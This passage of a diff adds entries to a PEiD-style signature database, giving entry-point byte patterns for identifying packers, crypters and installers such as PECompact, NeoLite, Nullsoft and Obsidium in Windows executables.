+signature = 55 8B EC 83 EC 44 56 FF 15 94 13 42 00 8B F0 B1 22 8A 06 3A C1 75 13 8A 46 01 46 3A C1 74 04 84 C0 75 F4 38 0E 75 0D 46 EB 0A 3C 20 7E 06
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v4.0]
+signature = 83 EC 44 56 FF 15 24 41 43 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v5.0]
+signature = 83 EC 44 56 FF 15 70 61 44 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C 3C 20 7E 08 8A 46 01 46 3C 20 7F F8 8A 06 84 C0 74 0C 3C 20 7F 08 8A 46 01 46 84 C0 75 F4 8D 44 24 04 C7 44 24 30 00 00 00 00 50 FF 15 80 61 44 00 F6 44 24 30 01 74 0B 8B 44 24 34 25 FF FF 00 00 EB 05 B8 0A 00 00 00 50 56 6A 00 6A 00 FF 15 74 61 44 00 50 E8 18 00 00 00 50 FF 15 78 61 44 00 5E 83 C4 44 C3 90 90 90 90 90 90
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v6.0]
+signature = 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C
+ep_only = true
+
+[Morphine v1.2]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? 00 00 00 66 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 51 66 ?? ?? ?? 59 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E2 ?? ?? ?? ?? ?? 82 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[Morphine v1.2 (DLL)]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 5B ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00
+ep_only = true
+
+[Neolite v2.0]
+signature = E9 A6 00 00 00
+ep_only = true
+
+[NeoLite vx.x]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9E 37 00 00 ?? ?? 48 ?? ?? ?? 6F 4C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 61
+ep_only = true
+
+[NeoLite v1.0]
+signature = E9 9B 00 00 00 A0
+ep_only = true
+
+[NeoLite v1.0]
+signature = 8B 44 24 04 8D 54 24 FC 23 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 FF 25
+ep_only = true
+
+[NeoLite v2.00]
+signature = E9 A6
+ep_only = true
+
+[NeoLite v2.00]
+signature = 8B 44 24 04 23 05 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 FE 05 ?? ?? ?? ?? 0B C0 74
+ep_only = true
+
+[NeoLite v2.0]
+signature = E9 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4E 65 6F 4C 69 74 65
+ep_only = true
+
+[NFO v1.0]
+signature = 8D 50 12 2B C9 B1 1E 8A 02 34 77 88 02 42 E2 F7 C8 8C
+ep_only = true
+
+[NFO v1.x modified]
+signature = 60 9C 8D 50
+ep_only = true
+
+[NoodleCrypt v2.0]
+signature = EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01
+ep_only = true
+
+[Nullsoft Install System v1.xx]
+signature = 55 8B EC 83 EC 2C 53 56 33 F6 57 56 89 75 DC 89 75 F4 BB A4 9E 40 00 FF 15 60 70 40 00 BF C0 B2 40 00 68 04 01 00 00 57 50 A3 AC B2 40 00 FF 15 4C 70 40 00 56 56 6A 03 56 6A 01 68 00 00 00 80 57 FF 15 9C 70 40 00 8B F8 83 FF FF 89 7D EC 0F 84 C3 00 00 00 56 56 56 89 75 E4 E8 C1 C9 FF FF 8B 1D 68 70 40 00 83 C4 0C 89 45 E8 89 75 F0 6A 02 56 6A FC 57 FF D3 89 45 FC 8D 45 F8 56 50 8D 45 E4 6A 04 50 57 FF 15 48 70 40 00 85 C0 75 07 BB 7C 9E 40 00 EB 7A 56 56 56 57 FF D3 39 75 FC 7E 62 BF 74 A2 40 00 B8 00 10 00 00 39 45 FC 7F 03 8B 45 FC 8D 4D F8 56 51 50 57 FF 75 EC FF 15 48 70 40 00 85 C0 74 5A FF 75 F8 57 FF 75 E8 E8 4D C9 FF FF 89 45 E8 8B 45 F8 29 45 FC 83 C4 0C 39 75 F4 75 11 57 E8 D3 F9 FF FF 85 C0 59 74 06 8B 45 F0 89 45 F4 8B 45 F8 01 45 F0 39 75 FC
+ep_only = true
+
+[Nullsoft Install System v1.xx]
+signature = 83 EC 0C 53 56 57 FF 15 20 71 40 00 05 E8 03 00 00 BE 60 FD 41 00 89 44 24 10 B3 20 FF 15 28 70 40 00 68 00 04 00 00 FF 15 28 71 40 00 50 56 FF 15 08 71 40 00 80 3D 60 FD 41 00 22 75 08 80 C3 02 BE 61 FD 41 00 8A 06 8B 3D F0 71 40 00 84 C0 74 0F 3A C3 74 0B 56 FF D7 8B F0 8A 06 84 C0 75 F1 80 3E 00 74 05 56 FF D7 8B F0 89 74 24 14 80 3E 20 75 07 56 FF D7 8B F0 EB F4 80 3E 2F 75
+ep_only = true
+
+[Nullsoft Install System v1.98]
+signature = 83 EC 0C 53 56 57 FF 15 2C 81 40
+ep_only = true
+
+[Nullsoft Install System v2.0b2, v2.0b3]
+signature = 83 EC 0C 53 55 56 57 FF 15 ?? 70 40 00 8B 35 ?? 92 40 00 05 E8 03 00 00 89 44 24 14 B3 20 FF 15 2C 70 40 00 BF 00 04 00 00 68 ?? ?? ?? 00 57 FF 15 ?? ?? 40 00 57 FF 15
+ep_only = true
+
+[Nullsoft PIMP Install System v1.3x]
+signature = 55 8B EC 81 EC ?? ?? 00 00 56 57 6A ?? BE ?? ?? ?? ?? 59 8D BD
+ep_only = true
+
+[Nullsoft PIMP Install System v1.x]
+signature = 83 EC 5C 53 55 56 57 FF 15 ?? ?? ?? 00
+ep_only = true
+
+[NX PE Packer v1.0]
+signature = FF 60 FF CA FF 00 BA DC 0D E0 40 00 50 00 60 00 70 00 80 00
+ep_only = true
+
+[Obsidium v1.1.1.1]
+signature = EB 02 ?? ?? E8 E7 1C 00 00
+ep_only = true
+
+[Obsidium v1.0.0.59 Final]
+signature = E8 AB 1C
+ep_only = true
+
+[Obsidium v1.0.0.61]
+signature = E8 AF 1C 00 00
+ep_only = true
+
+[Obsidium vx.x.x.x]
+signature = E8 47 19
+ep_only = true
+
+[ORiEN v2.11 (DEMO)]
+signature = E9 5D 01 00 00 CE D1 CE CE 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F 74 65 63 74 69 6F 6E 20 73 79 73 74 65 6D 20 2D 0D 0A 2D 2D 2D 2D 2D 2D 20 43 72 65 61 74 65 64 20 62 79 20 41 2E 20 46 69 73 75 6E 2C 20 31 39 39 34 2D 32 30 30 33 20 2D 2D 2D 2D 2D 2D 0D 0A 2D 2D 2D 2D 2D 2D 2D 20 57 57 57 3A 20 68 74 74 70 3A 2F 2F 7A 61 6C 65 78 66 2E 6E 61 72 6F 64 2E 72 75 2F 20 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 20 65 2D 6D 61 69 6C 3A 20 7A 61 6C 65 78 66 40 68 6F 74 6D 61 69 6C 2E 72 75 20 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D
+ep_only = true
+
+[Pack Master v1.0]
+signature = 60 E8 01 ?? ?? ?? E8 83 C4 04 E8 01 ?? ?? ?? E9 5D 81 ED D3 22 40 ?? E8 04 02 ?? ?? E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46
+ep_only = true
+
+[PC PE Encryptor Alpha preview]
+signature = 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 ?? 2B 8D EE 32 40 00 83 E9 0B 89 8D F2 32 40 ?? 80 BD D1 32 40 ?? 01 0F 84
+ep_only = true
+
+[PEEncrypt v4.0b (JunkCode)]
+signature = 66 ?? ?? 00 66 83 ?? 00
+ep_only = true
+
+[PE Crypt v1.00/v1.01]
+signature = E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB
+ep_only = true
+
+[PE Crypt v1.02]
+signature = E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44
+ep_only = true
+
+[PE Crypt32 v1.02]
+signature = E8 00 00 00 00 5B 83 ?? ?? EB ?? 52 4E 44 21
+ep_only = true
+
+[PE Crypt32 (Console v1.0, v1.01, v1.02)]
+signature = E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB
+ep_only = true
+
+[PE Intro v1.0]
+signature = 8B 04 24 9C 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 45 40 ?? 80 BD 67 44 40 ?? ?? 0F 85 48
+ep_only = true
+
+[PE Lock NT v2.01]
+signature = EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD
+ep_only = true
+
+[PE Lock NT v2.02c]
+signature = EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD
+ep_only = true
+
+[PE Lock NT v2.03]
+signature = EB 02 C7 85 1E EB 03 CD 20 C7 9C EB 02 69 B1 60 EB 02 EB 01
+ep_only = true
+
+[PE Lock NT v2.04]
+signature = EB ?? CD ?? ?? ?? ?? ?? CD ?? ?? ?? ?? ?? EB ?? EB ?? EB ?? EB ?? CD ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 C3
+ep_only = true
+
+[PE Lock v1.06]
+signature = 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 4B 45
+ep_only = true
+
+[PE Pack v0.99]
+signature = 60 E8 ?? ?? ?? ?? 5D 83 ED 06 80 BD E0 04 ?? ?? 01 0F 84 F2
+ep_only = true
+
+[PE Pack v1.0]
+signature = 74 ?? E9
+ep_only = true
+
+[PE Packer]
+signature = FC 8B 35 70 01 40 ?? 83 EE 40 6A 40 68 ?? 30 10
+ep_only = true
+
+[PE Password v0.2 SMT/SMF]
+signature = E8 04 ?? ?? ?? 8B EC 5D C3 33 C0 5D 8B FD 81 ED 33 26 40 ?? 81 EF ?? ?? ?? ?? 83 EF 05 89 AD 88 27 40 ?? 8D 9D 07 29 40 ?? 8D B5 62 28 40 ?? 46 80
+ep_only = true
+
+[PE Protect v0.9]
+signature = 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 ?? ?? ?? ?? 58 83 C0 07 C6 ?? C3
+ep_only = true
+
+[PC Shrinker v0.20]
+signature = E8 E8 01 ?? ?? 60 01 AD B3 27 40 ?? 68
+ep_only = true
+
+[PC Shrinker v0.29]
+signature =  ?? BD ?? ?? ?? ?? 01 AD 55 39 40 ?? 8D B5 35 39 40
+ep_only = true
+
+[PC Shrinker v0.45]
+signature =  ?? BD ?? ?? ?? ?? 01 AD E3 38 40 ?? FF B5 DF 38 40
+ep_only = true
+
+[PC Shrinker v0.71]
+signature = 9C 60 BD ?? ?? ?? ?? 01 AD 54 3A 40 ?? FF B5 50 3A 40 ?? 6A 40 FF 95 88 3A 40 ?? 50 50 2D ?? ?? ?? ?? 89 85
+ep_only = true
+
+[PC-Guard v3.03d, v3.05d]
+signature = 55 50 E8 ?? ?? ?? ?? 5D EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01
+ep_only = true
+
+[PC-Guard v4.05d, v4.10d, v4.15d]
+signature = FC 55 50 E8 00 00 00 00 5D EB 01
+ep_only = true
+
+[PC-Guard v5.00d]
+signature = FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 30 D2 40 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 89 85 E1 EA 41 00 9C EB 01 D5 9D EB 01 0B 58 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 89 85 F9 EA 41 00 9C EB 01 D5 9D EB 01 0B 89 9D E5 EA 41 00 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 89 8D E9 EA 41 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 89 95 ED EA 41 00 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 89 B5 F1 EA 41 00 9C EB 01 D5 9D EB 01 0B 89
+ep_only = true
+
+[PE-Crypter]
+signature = 60 E8 00 00 00 00 5D EB 26
+ep_only = true
+
+[Pack Master v1.0]
+signature = 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46
+ep_only = true
+
+[PEBundle v0.2 - v2.0x]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95
+ep_only = true
+
+[PEBundle v2.0b5 - v2.3]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 01 AD ?? ?? ?? ?? 01 AD
+ep_only = true
+
+[PEBundle v2.44]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 83 BD
+ep_only = true
+
+[PECompact v0.90]
+signature = EB 06 68 ?? ?? 40 00 C3 9C 60 BD ?? ?? 00 00 B9 02 00 00 00 B0 90 8D BD 7A 42 40 00 F3 AA 01 AD D9 43 40 00 FF B5
+ep_only = true
+
+[PECompact v0.92]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 BD ?? ?? ?? ?? B9 02 ?? ?? ?? B0 90 8D BD A5 4F 40 ?? F3 AA 01 AD 04 51 40 ?? FF B5
+ep_only = true
+
+[PECompact v0.94]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 ?? ?? ?? ?? 5D 55 58 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 01 85 ?? ?? ?? ?? 50 B9 02
+ep_only = true
+
+[PECompact v0.971 - v0.976]
+signature = EB 06 68 C3 9C 60 E8 5D 55 5B 81 ED 8B 85 01 85 66 C7 85
+ep_only = true
+
+[PECompact v0.977]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB A0 86 40 ?? 87 DD 8B 85 2A 87
+ep_only = true
+
+[PECompact v0.978]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 24 88 40 ?? 87 DD 8B 85 A9 88
+ep_only = true
+
+[PECompact v0.978.1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 49 87 40 ?? 87 DD 8B 85 CE 87
+ep_only = true
+
+[PECompact v0.978.2]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D1 84 40 ?? 87 DD 8B 85 56 85
+ep_only = true
+
+[PECompact v0.98]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D7 84 40 ?? 87 DD 8B 85 5C 85
+ep_only = true
+
+[PECompact v0.99]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 2F 85 40 ?? 87 DD 8B 85 B4 85
+ep_only = true
+
+[PECompact v1.00]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB C4 84 40 ?? 87 DD 8B 85 49 85
+ep_only = true
+
+[PECompact v1.10b1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 28 63 40 ?? 87 DD 8B 85 AD 63
+ep_only = true
+
+[PECompact v1.10b2]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 94 60
+ep_only = true
+
+[PECompact v1.10b3]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 95
+ep_only = true
+
+[PECompact v1.10b4]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 44
+ep_only = true
+
+[PECompact v1.10b5]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 49
+ep_only = true
+
+[PECompact v1.10b6]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 ?? 00 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB B7
+ep_only = true
+
+[PECompact v1.10b7]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB 14
+ep_only = true
+
+[PECompact v1.20 - v1.20.1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 9A 70 40
+ep_only = true
+
+[PECompact v1.22]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 ?? 70 40 ?? 90 90 01 85 9E 70 40 ?? BB F3 08
+ep_only = true
+
+[PECompact v1.23b3 - v1.24.1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 08
+ep_only = true
+
+[PECompact v1.24.2 - v1.24.3]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 09
+ep_only = true
+
+[PECompact v1.25]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? F3 0D
+ep_only = true
+
+[PECompact v1.26b1 - v1.26b2]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? 05 0E
+ep_only = true
+
+[PECompact v1.33]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 00 80 40 ?? 90 90 01 85 9E 80 40 ?? BB E8 0E
+ep_only = true
+
+[PECompact v1.34 - v1.40b1]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 00 80 ?? 40 90 90 01 85 9E 80 ?? 40 BB F8 10
+ep_only = true
+
+[PECompact v1.40b2 - v1.40b4]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 86 11
+ep_only = true
+
+[PECompact v1.40b5 - v1.40b6]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 8A 11
+ep_only = true
+
+[PECompact v1.40 - v1.45]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB C3 11
+ep_only = true
+
+[PECompact v1.46]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 60 12
+ep_only = true
+
+[PECompact v1.47 - v1.50]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 5B 12
+ep_only = true
+
+[PECompact v1.55]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A2 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 9E 80 40 ?? BB 2D 12
+ep_only = true
+
+[PECompact v1.56]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 90 40 ?? 87 DD 8B 85 A2 90 40 ?? 01 85 03 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 9E 90 40 ?? BB 2D 12
+ep_only = true
+
+[PECompact v1.60 - v1.65]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 80 40 ?? 87 DD 8B 85 D2 80 40 ?? 01 85 33 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 CE 80 40 ?? BB BB 12
+ep_only = true
+
+[PECompact v1.66]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 ?? 87 DD 8B 85 E6 90 40 ?? 01 85 33 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 DA 90 40 ?? 01 85 DE 90 40 ?? 01 85 E2 90 40 ?? BB 5B 11
+ep_only = true
+
+[PECompact v1.67]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 8B 11
+ep_only = true
+
+[PECompact v1.68 - v1.84]
+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 7B 11
+ep_only = true
+
+[PECompact v1.4x+]
